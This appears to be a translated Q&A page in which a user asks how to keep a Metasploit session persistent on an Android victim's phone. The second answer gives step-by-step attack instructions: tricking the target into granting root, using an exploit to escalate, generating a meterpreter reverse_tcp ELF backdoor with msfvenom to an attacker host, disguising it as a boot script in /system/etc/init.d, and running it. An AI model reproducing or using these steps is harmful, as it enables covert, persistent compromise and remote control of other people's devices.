Kali Linux metasploit e android attack di PAYLOAD

1

In kali linux 2.0, quando eseguo exploit in msfconsole e la vittima apre il mio payload, come posso forzare la sessione a essere persistente?

    
posta MohammadRezaHosseini 21.03.2016 - 19:09
fonte

2 risposte

2

Per le piattaforme Android, quando si utilizza il progetto metasploit-framework, è necessario utilizzare meterpreter come installazione APK per stabilire la persistenza.

Il download AndroidPayload è disponibile qui: link

Un post più dettagliato che spiega tutte le dipendenze può essere trovato qui: link

    
risposta data 21.03.2016 - 19:56
fonte
0

In parte un riassunto di ciò che è già stato detto:

1) Verifica se il target ha radicato il suo telefono . Se lo ha, usa l'ingegneria sociale per richiedere i privilegi di superutente tramite un prompt con

Runtime.getRuntime().exec("su");

E usa il processo di root per eseguire i passaggi 5 e 6

2) Altrimenti trova un exploit, ad esempio vai qui e scorri verso il basso ad android .

2.5) Spero che il bersaglio ignori il "Nuovo software disponibile!"  richiesta spesso

3) Aumenta i privilegi della tua sessione su root. Se non puoi, non c'è fortuna. Spero che faccia pagare bene il suo telefono.

4) Crea un binario ELF che verrà eseguito all'avvio

msfvenom -p android/meterpreter/reverse_tcp -f elf LHOST= 192.168.43.107 LPORT=4444 R > /root/backdoor.elf

5) Copialo nella posizione remota con un nome normale (mountsd)

meterpreter> upload backdoor.elf /system/etc/init.d/92mountsd.elf

6) Esegui (o attendi il riavvio)

meterpreter> execute /system/etc/init.d/92mountsd.elf
    
risposta data 11.01.2017 - 00:53
fonte

Leggi altre domande sui tag